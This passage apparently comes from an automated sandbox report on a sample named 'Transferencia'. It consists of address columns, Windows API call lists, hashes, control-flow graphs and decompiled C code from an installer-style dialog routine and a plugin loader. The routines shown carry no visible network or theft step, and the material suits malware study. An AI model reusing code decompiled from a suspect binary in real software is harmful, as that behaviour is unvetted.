                                                0x732a220b
                                                0x732a2211
                                                0x732a2214
                                                0x732a2230
                                                0x732a2216
                                                0x732a221f
                                                0x732a2222
                                                0x732a2222
                                                0x00000000
                                                0x732a2214
                                                0x732a21e3
                                                0x732a21e6
                                                0x732a21ea
                                                0x00000000
                                                0x00000000
                                                0x732a21ec
                                                0x00000000
                                                0x732a21ec
                                                0x732a21d5
                                                0x732a21d8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a21d8
                                                0x732a1dfe
                                                0x732a1dfe
                                                0x732a1dff
                                                0x732a1f49
                                                0x732a1f49
                                                0x732a1f50
                                                0x732a1f53
                                                0x00000000
                                                0x00000000
                                                0x732a1f60
                                                0x00000000
                                                0x732a214b
                                                0x732a214e
                                                0x732a2151
                                                0x732a2151
                                                0x732a2152
                                                0x732a2153
                                                0x732a2156
                                                0x732a2159
                                                0x732a215c
                                                0x00000000
                                                0x00000000
                                                0x732a215e
                                                0x732a215e
                                                0x732a2162
                                                0x732a217a
                                                0x732a217d
                                                0x732a2181
                                                0x732a2187
                                                0x00000000
                                                0x732a2187
                                                0x732a2164
                                                0x732a2164
                                                0x732a2167
                                                0x00000000
                                                0x00000000
                                                0x732a2169
                                                0x732a216c
                                                0x732a216e
                                                0x732a216f
                                                0x732a216f
                                                0x732a216f
                                                0x732a2170
                                                0x732a2173
                                                0x732a2176
                                                0x732a2177
                                                0x732a2151
                                                0x732a2152
                                                0x732a2153
                                                0x732a2156
                                                0x732a2159
                                                0x732a215c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a215c
                                                0x00000000
                                                0x732a1fa7
                                                0x00000000
                                                0x00000000
                                                0x732a1fb3
                                                0x00000000
                                                0x00000000
                                                0x732a1f9a
                                                0x732a1f9e
                                                0x732a1fa2
                                                0x00000000
                                                0x00000000
                                                0x732a211c
                                                0x732a2120
                                                0x00000000
                                                0x00000000
                                                0x732a2126
                                                0x732a212f
                                                0x732a2136
                                                0x732a213e
                                                0x00000000
                                                0x00000000
                                                0x732a2083
                                                0x732a2083
                                                0x00000000
                                                0x00000000
                                                0x732a1fbc
                                                0x00000000
                                                0x00000000
                                                0x732a21a6
                                                0x00000000
                                                0x00000000
                                                0x732a208b
                                                0x732a208d
                                                0x732a208d
                                                0x00000000
                                                0x00000000
                                                0x732a2196
                                                0x00000000
                                                0x00000000
                                                0x732a219a
                                                0x00000000
                                                0x00000000
                                                0x732a21a2
                                                0x00000000
                                                0x00000000
                                                0x732a20d3
                                                0x732a20d5
                                                0x732a20d5
                                                0x00000000
                                                0x00000000
                                                0x732a209d
                                                0x732a209f
                                                0x732a209f
                                                0x00000000
                                                0x00000000
                                                0x732a20af
                                                0x732a20b1
                                                0x732a20b1
                                                0x00000000
                                                0x00000000
                                                0x732a20e1
                                                0x732a20e3
                                                0x732a20e3
                                                0x00000000
                                                0x00000000
                                                0x732a20ba
                                                0x732a20bc
                                                0x732a20bc
                                                0x00000000
                                                0x00000000
                                                0x732a20c1
                                                0x00000000
                                                0x00000000
                                                0x732a219e
                                                0x732a21a8
                                                0x732a21a8
                                                0x00000000
                                                0x00000000
                                                0x732a20ec
                                                0x732a20f0
                                                0x732a20f5
                                                0x732a20f8
                                                0x732a20f9
                                                0x732a20fc
                                                0x732a2102
                                                0x732a2102
                                                0x00000000
                                                0x00000000
                                                0x732a218e
                                                0x00000000
                                                0x00000000
                                                0x732a20c5
                                                0x732a20c7
                                                0x732a20c7
                                                0x00000000
                                                0x00000000
                                                0x732a1fc3
                                                0x732a1fc3
                                                0x00000000
                                                0x00000000
                                                0x732a20da
                                                0x732a20dc
                                                0x732a20dc
                                                0x00000000
                                                0x00000000
                                                0x732a1f67
                                                0x732a1f6d
                                                0x732a1f70
                                                0x732a1f72
                                                0x732a1f72
                                                0x732a1f75
                                                0x732a1f79
                                                0x732a1f86
                                                0x732a1f88
                                                0x732a1f8e
                                                0x732a1f8e
                                                0x732a1f8e
                                                0x00000000
                                                0x00000000
                                                0x732a208e
                                                0x732a208e
                                                0x732a2090
                                                0x732a2097
                                                0x00000000
                                                0x00000000
                                                0x732a20d6
                                                0x732a20d6
                                                0x00000000
                                                0x00000000
                                                0x732a20a0
                                                0x732a20a0
                                                0x732a20a2
                                                0x732a20a9
                                                0x00000000
                                                0x00000000
                                                0x732a20b2
                                                0x732a20b2
                                                0x732a20b4
                                                0x00000000
                                                0x00000000
                                                0x732a20e4
                                                0x732a20e4
                                                0x00000000
                                                0x00000000
                                                0x732a20bd
                                                0x732a20bd
                                                0x00000000
                                                0x00000000
                                                0x732a210a
                                                0x732a210e
                                                0x732a2113
                                                0x732a2116
                                                0x00000000
                                                0x00000000
                                                0x732a20c8
                                                0x732a20c8
                                                0x732a20cb
                                                0x732a20cd
                                                0x00000000
                                                0x00000000
                                                0x732a20dd
                                                0x732a20dd
                                                0x732a20e6
                                                0x732a20e6
                                                0x732a1fc5
                                                0x732a1fc5
                                                0x732a1fc8
                                                0x732a1fcf
                                                0x732a1fd1
                                                0x732a1fd3
                                                0x732a1fda
                                                0x732a1fdd
                                                0x732a1fe2
                                                0x732a1fe4
                                                0x732a1fe6
                                                0x732a1fea
                                                0x732a1ff0
                                                0x732a1ff6
                                                0x732a1ff6
                                                0x732a1ff8
                                                0x732a1ff8
                                                0x732a1ff9
                                                0x732a1ff9
                                                0x732a1ffd
                                                0x732a2003
                                                0x732a2005
                                                0x732a2009
                                                0x732a200e
                                                0x732a200e
                                                0x732a2010
                                                0x732a2010
                                                0x732a2013
                                                0x732a2016
                                                0x732a201f
                                                0x732a2025
                                                0x732a2028
                                                0x732a2028
                                                0x732a202a
                                                0x732a202d
                                                0x732a2033
                                                0x732a2039
                                                0x732a2039
                                                0x732a203b
                                                0x00000000
                                                0x00000000
                                                0x732a2041
                                                0x732a2041
                                                0x732a2045
                                                0x732a204c
                                                0x732a2070
                                                0x732a2070
                                                0x732a2074
                                                0x732a2076
                                                0x732a2079
                                                0x732a2079
                                                0x732a207c
                                                0x732a207c
                                                0x00000000
                                                0x732a2074
                                                0x732a2051
                                                0x732a2054
                                                0x732a2054
                                                0x732a205b
                                                0x732a205d
                                                0x732a2060
                                                0x732a2067
                                                0x732a2068
                                                0x732a206e
                                                0x732a206e
                                                0x00000000
                                                0x732a206e
                                                0x732a2062
                                                0x732a2065
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a2065
                                                0x732a1ff2
                                                0x732a1ff4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1f60
                                                0x732a1e05
                                                0x732a1e05
                                                0x732a1e06
                                                0x732a1f46
                                                0x00000000
                                                0x732a1f46
                                                0x732a1e0c
                                                0x732a1e0d
                                                0x00000000
                                                0x00000000
                                                0x732a1e13
                                                0x732a1e16
                                                0x732a1f0b
                                                0x732a1f0b
                                                0x732a1f0e
                                                0x732a1f23
                                                0x732a1f25
                                                0x732a1f25
                                                0x732a1f26
                                                0x732a1f29
                                                0x732a1f2c
                                                0x732a1f38
                                                0x732a1f38
                                                0x732a1f38
                                                0x732a1f2e
                                                0x732a1f2e
                                                0x732a1f2e
                                                0x732a1f3e
                                                0x00000000
                                                0x732a1f3e
                                                0x732a1f10
                                                0x732a1f10
                                                0x732a1f11
                                                0x732a1f1f
                                                0x00000000
                                                0x732a1f1f
                                                0x732a1f14
                                                0x732a1f15
                                                0x00000000
                                                0x00000000
                                                0x732a1f1b
                                                0x00000000
                                                0x732a1f1b
                                                0x732a1e1c
                                                0x732a1f07
                                                0x00000000
                                                0x732a1f07
                                                0x732a1e22
                                                0x732a1e22
                                                0x732a1e25
                                                0x732a1e4e
                                                0x00000000
                                                0x732a1e4e
                                                0x732a1e27
                                                0x732a1e27
                                                0x732a1e2a
                                                0x732a1e44
                                                0x00000000
                                                0x732a1e44
                                                0x732a1e2c
                                                0x732a1e2c
                                                0x732a1e2f
                                                0x732a1e3e
                                                0x00000000
                                                0x732a1e3e
                                                0x732a1e32
                                                0x732a1e33
                                                0x00000000
                                                0x00000000
                                                0x732a1e35
                                                0x00000000
                                                0x732a1cec
                                                0x732a1cec
                                                0x732a1cef
                                                0x00000000
                                                0x732a1cef
                                                0x732a1ce6
                                                0x732a1cd3
                                                0x732a1cd8
                                                0x00000000
                                                0x00000000
                                                0x732a1cda
                                                0x732a1cdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a1cdd
                                                0x732a1c6d
                                                0x732a1c70
                                                0x732a1ca6
                                                0x732a1ca9
                                                0x00000000
                                                0x732a1caf
                                                0x732a1cb1
                                                0x732a1cb5
                                                0x732a1cbc
                                                0x732a1cc3
                                                0x732a1cc6
                                                0x732a1cc9
                                                0x00000000
                                                0x732a1cc9
                                                0x732a1ca9
                                                0x732a1c72
                                                0x732a1c73
                                                0x732a1c8e
                                                0x732a1c91
                                                0x00000000
                                                0x732a1c97
                                                0x732a1c97
                                                0x732a1c9e
                                                0x732a1ca1
                                                0x00000000
                                                0x732a1ca1
                                                0x732a1c91
                                                0x732a1c78
                                                0x00000000
                                                0x732a1c7e
                                                0x732a1c7e
                                                0x732a1c85
                                                0x00000000
                                                0x732a1c85
                                                0x732a1c78
                                                0x732a1e74
                                                0x732a1e79
                                                0x732a1e7e
                                                0x732a1e82
                                                0x732a2355
                                                0x732a235b
                                                0x732a1e94
                                                0x732a1e96
                                                0x732a1e97
                                                0x732a227e
                                                0x732a227e
                                                0x732a2281
                                                0x732a2284
                                                0x732a22a1
                                                0x732a22a7
                                                0x732a22a9
                                                0x732a22af
                                                0x732a22c6
                                                0x732a22c6
                                                0x732a22c6
                                                0x732a22d3
                                                0x732a22d9
                                                0x732a22dc
                                                0x732a22e2
                                                0x732a22e4
                                                0x732a22e8
                                                0x732a22ea
                                                0x732a22f1
                                                0x732a22f6
                                                0x732a22f9
                                                0x732a22fb
                                                0x732a2300
                                                0x732a2312
                                                0x732a2312
                                                0x732a2300
                                                0x732a22f9
                                                0x732a22e8
                                                0x732a2318
                                                0x732a231b
                                                0x732a2325
                                                0x732a232d
                                                0x732a233a
                                                0x732a2340
                                                0x732a2343
                                                0x732a2273
                                                0x732a2273
                                                0x00000000
                                                0x732a2273
                                                0x732a2349
                                                0x732a234f
                                                0x732a234f
                                                0x00000000
                                                0x00000000
                                                0x732a2351
                                                0x732a2351
                                                0x732a2351
                                                0x732a2351
                                                0x00000000
                                                0x732a231d
                                                0x732a231d
                                                0x732a2323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a2323
                                                0x732a231b
                                                0x732a22b2
                                                0x732a22b8
                                                0x732a22ba
                                                0x732a22c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732a22c0
                                                0x732a2286
                                                0x732a228d
                                                0x732a2293
                                                0x732a2299
                                                0x00000000
                                                0x732a2299
                                                0x732a1e9d
                                                0x732a1e9e
                                                0x732a225d
                                                0x732a225d
                                                0x732a2263
                                                0x732a2266
                                                0x00000000
                                                0x00000000
                                                0x732a226d
                                                0x732a2272
                                                0x00000000
                                                0x732a2272
                                                0x732a1ea5
                                                0x00000000
                                                0x00000000
                                                0x732a1eab
                                                0x732a1eab
                                                0x732a1eb4
                                                0x732a1eb9
                                                0x732a1ebf
                                                0x00000000
                                                0x00000000
                                                0x732a1ec5
                                                0x732a1ed2
                                                0x732a1ed8
                                                0x732a1ee2
                                                0x732a1ee8
                                                0x732a1ef0
                                                0x732a1f00
                                                0x00000000
                                                0x732a1f00

                                                APIs
                                                  • Part of subcall function 732A12BB: GlobalAlloc.KERNELBASE(00000040,?,732A12DB,?,732A137F,00000019,732A11CA,-000000A0), ref: 732A12C5
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 732A1D2D
                                                • lstrcpyW.KERNEL32 ref: 732A1D75
                                                • lstrcpyW.KERNEL32 ref: 732A1D7F
                                                • GlobalFree.KERNEL32 ref: 732A1D92
                                                • GlobalFree.KERNEL32 ref: 732A1E74
                                                • GlobalFree.KERNEL32 ref: 732A1E79
                                                • GlobalFree.KERNEL32 ref: 732A1E7E
                                                • GlobalFree.KERNEL32 ref: 732A2068
                                                • lstrcpyW.KERNEL32 ref: 732A2222
                                                • GetModuleHandleW.KERNELBASE(00000008), ref: 732A22A1
                                                • LoadLibraryW.KERNELBASE(00000008), ref: 732A22B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 732A230C
                                                • lstrlenW.KERNEL32(00000808), ref: 732A2326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.756317960.00000000732A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732A0000, based on PE: true
                                                • Associated: 00000000.00000002.756311352.00000000732A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756329828.00000000732A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.756338430.00000000732A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_732a0000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: a4e56608a653b16637cd12bd345ac8cc080309714812bc51578028341db27d54
                                                • Instruction ID: f05800736010d3b862c39305a2e702713afb90cddc242cf9fffdf7d69a145a14
                                                • Opcode Fuzzy Hash: a4e56608a653b16637cd12bd345ac8cc080309714812bc51578028341db27d54
                                                • Instruction Fuzzy Hash: 5122AB71E1470ADFDB158FACC9803EEB7B5FB08325F14452AD9A6E2280D7B4A6C1DB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 946 406850-406864 FindFirstFileW 947 406871 946->947 948 406866-40686f FindClose 946->948 949 406873-406874 947->949 948->949
                                                C-Code - Quality: 100%
                                                			E00406850(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x7a4f98;
                                                			}




                                                0x0040685b
                                                0x00406864
                                                0x00000000
                                                0x00406871
                                                0x00406867
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(76CDFAA0,007A4F98,C:\Users\user\AppData\Local\Temp\nstC730.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstC730.tmp,C:\Users\user\AppData\Local\Temp\nstC730.tmp,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                                                • FindClose.KERNEL32(00000000), ref: 00406867
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nstC730.tmp, xrefs: 00406850
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.755415149.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.755408358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755428109.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755438602.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755693232.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755731847.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755772036.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755817113.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755939181.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.755971847.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756009900.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756022297.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.756029667.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Transferencia.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\Users\user\AppData\Local\Temp\nstC730.tmp
                                                • API String ID: 2295610775-469808752
                                                • Opcode ID: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                • Instruction ID: 4aa2ce40dd0fdaaf15299f79bbf0ddad0ee07bd1ec444a92f9406ee76b8f93c8
                                                • Opcode Fuzzy Hash: 93d274fea3e94b44f6f55b1f097fc665565d90e42f153d0ad468ae4ce1295179
                                                • Instruction Fuzzy Hash: 3CD012365592205FC7402779AE0CC4B7A689F563313268B36B0EAF11F0CA74CC3296ED
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 403f77-403f89 195 4040f0-4040ff 194->195 196 403f8f-403f95 194->196 198 404101-40413c GetDlgItem * 2 call 404476 KiUserCallbackDispatcher call 40140b 195->198 199 40414e-404163 195->199 196->195 197 403f9b-403fa4 196->197 202 403fa6-403fb3 SetWindowPos 197->202 203 403fb9-403fc0 197->203 228 404141-404149 198->228 200 4041a3-4041a8 call 4044c2 199->200 201 404165-404168 199->201 213 4041ad-4041c8 200->213 205 40416a-404175 call 401389 201->205 206 40419b-40419d 201->206 202->203 208 403fc2-403fdc ShowWindow 203->208 209 404004-40400a 203->209 205->206 230 404177-404196 SendMessageW 205->230 206->200 212 404443 206->212 214 403fe2-403ff5 GetWindowLongW 208->214 215 4040dd-4040eb call 4044dd 208->215 216 404023-404026 209->216 217 40400c-40401e DestroyWindow 209->217 226 404445-40444c 212->226 223 4041d1-4041d7 213->223 224 4041ca-4041cc call 40140b 213->224 214->215 225 403ffb-403ffe ShowWindow 214->225 215->226 219 404028-404034 SetWindowLongW 216->219 220 404039-40403f 216->220 227 404420-404426 217->227 219->226 220->215 229 404045-404054 GetDlgItem 220->229 234 404401-40441a DestroyWindow EndDialog 223->234 235 4041dd-4041e8 223->235 224->223 225->209 227->212 233 404428-40442e 227->233 228->199 236 404073-404076 229->236 237 404056-40406d SendMessageW IsWindowEnabled 229->237 230->226 233->212 238 404430-404439 ShowWindow 233->238 234->227 235->234 239 4041ee-40423b call 406557 call 404476 * 3 GetDlgItem 235->239 240 404078-404079 236->240 241 40407b-40407e 236->241 237->212 237->236 238->212 266 404245-404281 ShowWindow KiUserCallbackDispatcher call 404498 EnableWindow 239->266 267 40423d-404242 239->267 244 4040a9-4040ae call 40444f 240->244 245 404080-404086 241->245 246 40408c-404091 241->246 244->215 249 4040c7-4040d7 SendMessageW 245->249 250 404088-40408a 245->250 246->249 251 404093-404099 246->251 249->215 250->244 254 4040b0-4040b9 call 40140b 251->254 255 40409b-4040a1 call 40140b 251->255 254->215 263 4040bb-4040c5 254->263 264 4040a7 255->264 263->264 264->244 270 404283-404284 266->270 271 404286 266->271 267->266 272 404288-4042b6 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042b8-4042c9 SendMessageW 272->273 274 4042cb 272->274 275 4042d1-404310 call 4044ab call 403f58 call 40651a lstrlenW call 406557 SetWindowTextW call 401389 273->275 274->275 275->213 286 404316-404318 275->286 286->213 287 40431e-404322 286->287 288 404341-404355 DestroyWindow 287->288 289 404324-40432a 287->289 288->227 290 40435b-404388 CreateDialogParamW 288->290 289->212 291 404330-404336 289->291 290->227 292 40438e-4043e5 call 404476 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 290->292 291->213 293 40433c 291->293 292->212 298 4043e7-4043fa ShowWindow call 4044c2 292->298 293->212 300 4043ff 298->300 300->227
                                                C-Code - Quality: 86%
                                                			E00403F77(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                				struct HWND__* _v28;
                                                				void* _v80;
                                                				void* _v84;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				signed int _t36;
                                                				signed int _t38;
                                                				struct HWND__* _t48;
                                                				signed int _t67;
                                                				struct HWND__* _t73;
                                                				signed int _t86;
                                                				struct HWND__* _t91;
                                                				signed int _t99;
                                                				int _t103;
                                                				signed int _t117;
                                                				int _t118;
                                                				int _t122;
                                                				signed int _t124;
                                                				struct HWND__* _t127;
                                                				struct HWND__* _t128;
                                                				int _t129;
                                                				intOrPtr _t130;
                                                				long _t133;
                                                				int _t135;
                                                				int _t136;
                                                				void* _t137;
                                                
                                                				_t130 = _a8;
                                                				if(_t130 == 0x110 || _t130 == 0x408) {
                                                					_t34 = _a12;
                                                					_t127 = _a4;
                                                					__eflags = _t130 - 0x110;
                                                					 *0x7a1f30 = _t34;
                                                					if(_t130 == 0x110) {
                                                						 *0x7a8a68 = _t127;
                                                						 *0x7a1f44 = GetDlgItem(_t127, 1);
                                                						_t91 = GetDlgItem(_t127, 2);
                                                						_push(0xffffffff);
                                                						_push(0x1c);
                                                						 *0x79ff10 = _t91;
                                                						E00404476(_t127);
                                                						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a48); // executed
                                                						 *0x7a7a2c = E0040140B(4);
                                                						_t34 = 1;
                                                						__eflags = 1;
                                                						 *0x7a1f30 = 1;
                                                					}
                                                					_t124 =  *0x40a368; // 0x0
                                                					_t136 = 0;
                                                					_t133 = (_t124 << 6) +  *0x7a8a80;
                                                					__eflags = _t124;
                                                					if(_t124 < 0) {
                                                						L36:
                                                						E004044C2(0x40b);
                                                						while(1) {
                                                							_t36 =  *0x7a1f30;
                                                							 *0x40a368 =  *0x40a368 + _t36;
                                                							_t133 = _t133 + (_t36 << 6);
                                                							_t38 =  *0x40a368; // 0x0
                                                							__eflags = _t38 -  *0x7a8a84;
                                                							if(_t38 ==  *0x7a8a84) {
                                                								E0040140B(1);
                                                							}
                                                							__eflags =  *0x7a7a2c - _t136;
                                                							if( *0x7a7a2c != _t136) {
                                                								break;
                                                							}
                                                							__eflags =  *0x40a368 -  *0x7a8a84; // 0x0
                                                							if(__eflags >= 0) {
                                                								break;
                                                							}
                                                							_t117 =  *(_t133 + 0x14);
                                                							E00406557(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
                                                							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                							_push(0xfffffc19);
                                                							E00404476(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                							_push(0xfffffc1b);
                                                							E00404476(_t127);
                                                							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                							_push(0xfffffc1a);
                                                							E00404476(_t127);
                                                							_t48 = GetDlgItem(_t127, 3);
                                                							__eflags =  *0x7a8aec - _t136;
                                                							_v28 = _t48;
                                                							if( *0x7a8aec != _t136) {
                                                								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                								__eflags = _t117;
                                                							}
                                                							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                							E00404498(_t117 & 0x00000002);
                                                							_t118 = _t117 & 0x00000004;
                                                							EnableWindow( *0x79ff10, _t118);
                                                							__eflags = _t118 - _t136;
                                                							if(_t118 == _t136) {
                                                								_push(1);
                                                							} else {
                                                								_push(_t136);
                                                							}
                                                							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                							__eflags =  *0x7a8aec - _t136;
                                                							if( *0x7a8aec == _t136) {
                                                								_push( *0x7a1f44);
                                                							} else {
                                                								SendMessageW(_t127, 0x401, 2, _t136);
                                                								_push( *0x79ff10);
                                                							}
                                                							E004044AB();
                                                							E0040651A(0x7a1f48, E00403F58());
                                                							E00406557(0x7a1f48, _t127, _t133,  &(0x7a1f48[lstrlenW(0x7a1f48)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                							SetWindowTextW(_t127, 0x7a1f48); // executed
                                                							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                							__eflags = _t67;
                                                							if(_t67 != 0) {
                                                								continue;
                                                							} else {
                                                								__eflags =  *_t133 - _t136;
                                                								if( *_t133 == _t136) {
                                                									continue;
                                                								}
                                                								__eflags =  *(_t133 + 4) - 5;
                                                								if( *(_t133 + 4) != 5) {
                                                									DestroyWindow( *0x7a7a38); // executed
                                                									 *0x7a0f20 = _t133;
                                                									__eflags =  *_t133 - _t136;
                                                									if( *_t133 <= _t136) {
                                                										goto L60;
                                                									}
                                                									_t73 = CreateDialogParamW( *0x7a8a60,  *_t133 +  *0x7a7a40 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "5F@"), _t133); // executed
                                                									__eflags = _t73 - _t136;
                                                									 *0x7a7a38 = _t73;
                                                									if(_t73 == _t136) {
                                                										goto L60;
                                                									}
                                                									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                									_push(6);
                                                									E00404476(_t73);
                                                									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                									ScreenToClient(_t127, _t137 + 0x10);
                                                									SetWindowPos( *0x7a7a38, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                									__eflags =  *0x7a7a2c - _t136;
                                                									if( *0x7a7a2c != _t136) {
                                                										goto L63;
                                                									}
                                                									ShowWindow( *0x7a7a38, 8); // executed
                                                									E004044C2(0x405);
                                                									goto L60;
                                                								}
                                                								__eflags =  *0x7a8aec - _t136;
                                                								if( *0x7a8aec != _t136) {
                                                									goto L63;
                                                								}
                                                								__eflags =  *0x7a8ae0 - _t136;
                                                								if( *0x7a8ae0 != _t136) {
                                                									continue;
                                                								}
                                                								goto L63;
                                                							}
                                                						}
                                                						DestroyWindow( *0x7a7a38);
                                                						 *0x7a8a68 = _t136;
                                                						EndDialog(_t127,  *0x7a0718);
                                                						goto L60;
                                                					} else {
                                                						__eflags = _t34 - 1;
                                                						if(_t34 != 1) {
                                                							L35:
                                                							__eflags =  *_t133 - _t136;
                                                							if( *_t133 == _t136) {
                                                								goto L63;
                                                							}
                                                							goto L36;
                                                						}
                                                						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                						__eflags = _t86;
                                                						if(_t86 == 0) {
                                                							goto L35;
                                                						}
                                                						SendMessageW( *0x7a7a38, 0x40f, 0, 1);
                                                						__eflags =  *0x7a7a2c;
                                                						return 0 |  *0x7a7a2c == 0x00000000;
                                                					}
                                                				} else {
                                                					_t127 = _a4;
                                                					_t136 = 0;
                                                					if(_t130 == 0x47) {
                                                						SetWindowPos( *0x7a1f28, _t127, 0, 0, 0, 0, 0x13);
                                                					}
                                                					_t122 = _a12;
                                                					if(_t130 != 5) {
                                                						L8:
                                                						if(_t130 != 0x40d) {
                                                							__eflags = _t130 - 0x11;
                                                							if(_t130 != 0x11) {
                                                								__eflags = _t130 - 0x111;
                                                								if(_t130 != 0x111) {
                                                									goto L28;
                                                								}
                                                								_t135 = _t122 & 0x0000ffff;
                                                								_t128 = GetDlgItem(_t127, _t135);
                                                								__eflags = _t128 - _t136;
                                                								if(_t128 == _t136) {
                                                									L15:
                                                									__eflags = _t135 - 1;
                                                									if(_t135 != 1) {
                                                										__eflags = _t135 - 3;
                                                										if(_t135 != 3) {
                                                											_t129 = 2;
                                                											__eflags = _t135 - _t129;
                                                											if(_t135 != _t129) {
                                                												L27:
                                                												SendMessageW( *0x7a7a38, 0x111, _t122, _a16);
                                                												goto L28;
                                                											}
                                                											__eflags =  *0x7a8aec - _t136;
                                                											if( *0x7a8aec == _t136) {
                                                												_t99 = E0040140B(3);
                                                												__eflags = _t99;
                                                												if(_t99 != 0) {
                                                													goto L28;
                                                												}
                                                												 *0x7a0718 = 1;
                                                												L23:
                                                												_push(0x78);
                                                												L24:
                                                												E0040444F();
                                                												goto L28;
                                                											}
                                                											E0040140B(_t129);
                                                											 *0x7a0718 = _t129;
                                                											goto L23;
                                                										}
                                                										__eflags =  *0x40a368 - _t136; // 0x0
                                                										if(__eflags <= 0) {
                                                											goto L27;
                                                										}
                                                										_push(0xffffffff);
                                                										goto L24;
                                                									}
                                                									_push(_t135);
                                                									goto L24;
                                                								}
                                                								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                								_t103 = IsWindowEnabled(_t128);
                                                								__eflags = _t103;
                                                								if(_t103 == 0) {
                                                									L63:
                                                									return 0;
                                                								}
                                                								goto L15;
                                                							}
                                                							SetWindowLongW(_t127, _t136, _t136);
                                                							return 1;
                                                						}
                                                						DestroyWindow( *0x7a7a38);
                                                						 *0x7a7a38 = _t122;
                                                						L60:
                                                						if( *0x7a3f48 == _t136 &&  *0x7a7a38 != _t136) {
                                                							ShowWindow(_t127, 0xa); // executed
                                                							 *0x7a3f48 = 1;
                                                						}
                                                						goto L63;
                                                					} else {
                                                						asm("sbb eax, eax");
                                                						ShowWindow( *0x7a1f28,  ~(_t122 - 1) & 0x00000005);
                                                						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                							L28:
                                                							return E004044DD(_a8, _t122, _a16);
                                                						} else {
                                                							ShowWindow(_t127, 4);
                                                							goto L8;
